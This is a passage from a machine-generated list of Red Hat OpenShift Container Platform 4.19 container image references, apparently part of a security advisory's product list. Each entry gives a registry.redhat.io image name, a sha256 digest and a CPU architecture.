"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
